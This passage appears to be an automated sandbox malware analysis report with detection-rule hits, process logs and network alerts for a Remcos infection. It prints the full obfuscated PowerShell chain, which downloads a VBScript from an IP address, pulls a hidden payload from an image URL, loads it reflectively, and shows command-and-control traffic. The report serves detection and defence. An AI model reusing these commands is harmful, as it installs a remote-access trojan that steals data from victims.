Y2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeing, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFz
                          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgI
                          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7884, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS" , ProcessId: 8136, ProcessName: wscript.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eykjjr5p\eykjjr5p.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eykjjr5p\eykjjr5p.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7884, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eykjjr5p\eykjjr5p.cmdline", ProcessId: 8008, ProcessName: csc.exe
                          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7884, TargetFilename: C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS
                          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7884, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS" , ProcessId: 8136, ProcessName: wscript.exe
                          Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7884, TargetFilename: C:\Users\user\AppData\Local\Temp\eykjjr5p\eykjjr5p.cmdline
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))", CommandLine: pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICA

                          Data Obfuscation

                          barindex
                          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eykjjr5p\eykjjr5p.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eykjjr5p\eykjjr5p.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7884, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eykjjr5p\eykjjr5p.cmdline", ProcessId: 8008, ProcessName: csc.exe

                          Stealing of Sensitive Information

                          barindex
                          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 6832, TargetFilename: C:\ProgramData\remcos\logs.dat
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-17T09:45:47.776261+010020204251Exploit Kit Activity Detected172.67.187.200443192.168.2.849710TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-17T09:45:47.776261+010020204241Exploit Kit Activity Detected172.67.187.200443192.168.2.849710TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-17T09:45:59.728111+010020365941Malware Command and Control Activity Detected192.168.2.849711192.169.69.266946TCP
                          2024-12-17T09:46:11.315503+010020365941Malware Command and Control Activity Detected192.168.2.849712192.169.69.266946TCP
                          2024-12-17T09:46:22.826218+010020365941Malware Command and Control Activity Detected192.168.2.849714192.169.69.266946TCP
                          2024-12-17T09:46:34.275094+010020365941Malware Command and Control Activity Detected192.168.2.849715192.169.69.266946TCP
